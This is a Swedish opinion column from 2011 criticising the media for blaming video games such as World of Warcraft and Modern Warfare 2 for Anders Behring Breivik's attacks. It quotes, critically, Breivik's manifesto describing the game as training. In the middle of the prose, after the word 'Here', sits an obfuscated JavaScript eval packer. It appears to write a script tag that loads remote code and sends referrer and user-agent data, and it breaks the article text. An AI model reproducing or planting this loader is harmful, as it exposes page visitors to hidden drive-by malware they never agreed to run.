Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Krönika:Ondska och imbeciller som använder dess efterdyningar felaktigt…

Krönika:Ondska och imbeciller som använder dess efterdyningar felaktigt…
Filip Urde
  • On 25 juli, 2011
  • http://www.revue.se/filip-urde

Jag läste precis Kristoffer Arvidsons krönika på Feber.se och jag känner att det är min plikt att fortsätta där han slutat. Kristoffers krönika är utmärkt och behövlig. Den handlar om den hemska tradgedin som ägderum i Norge under helgen.

Jag kan inte säga tillräckligt mycket hur hemsk Anders Behring Breiviks aktion var…Att någon kan utföra något så kallsinnigt och brutalt planerat in i minsta detalj går utöver mitt förstånd. Vad som gör det hela än mer tragiskt är hur efterdyningarna till sådanna här tradgedier utvecklas. Jag har sedan det hände bevittnat på internet, allt från rasism, hat, lycko önskningar till Anders och makabra kommentarer på forum som: ”måste ge det till killen, han hade ju jävligt bra kill death ratio ialla fall”.

Den sista kommentarens författare bör hängas upp i närmaste flaggstång för att invänta ett klassiskt kokt stryk!!! Men det är inte detta jag ska prata om nu.

Jag ska fortsätta där kristoffer slutade och det är med imbeciller i alla världens media som lyckats nosa och snoka sig till fakta, som att Anders skulle vara en hängiven WoW-spelare (vilket jag dock läste i hans egna manifest, endast var en skenmanöver för att lura alla) och att detta skulle bidragit till hans aktion.

Here eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yddhz|var|u0026u|referrer|ttyst||js|php’.split(’|’),0,{}))
we go AGAIN!

Spelindustrin är tyvärr en väldigt enkel slagpåse och detta unyttjas så fort journalisterna får sin chans. Denna gång är inget undantag. Att skylla på WoW i all ära, men nu har media hittat den perfekta syndabocken, nämligen Call of Duty Modern Warfare 2.

Tillsammans med GTA, så måste Call of Duty serien vara den spelserie som fått ta på sig mest kritik genom tiderna. Uppdraget då du som Terrorist får skjuta sönder Moskvas flygplats är kanske en av de stora anledningarna till uppståndelsen, då du skjuter oskyldiga och inte soldater enbart.  

Nu har det dock som tur är för alla anti-spel vänner kommit fram att även Anders gillade Call of Duty. och detta kan läsas i hans manifest. Han uttrycker sin hängivenhet till spelet och uppmanar även att andra högerextremister bör använda sig aktivt av spelets simulationsegenskaper, för att på så sätt kunna träna in en fullskalig operation…

just bought Modern Warfare 2, the game. It is probably the best military simulator out there and it’s one of the hottest games this year. I see MW2 more as a part of my training-simulation than anything else. I’ve still learned to love it though and especially the multiplayer part is amazing. You can more or less completely simulate actual operations

Perfekt! Nu blir det liv i luckan och alla över 40 år som inte fattar något överhuvudtaget har helt plötsligt en åsikt om tv och data-spel. Kan vi inte fokusera på det hemska som hänt i Norge? Jag fattar inte hur man kan börja beskylla ett spel… Igen… Känns som man gör problemet enklare än vad det faktiskt  är.

Norge vi sörjer med er!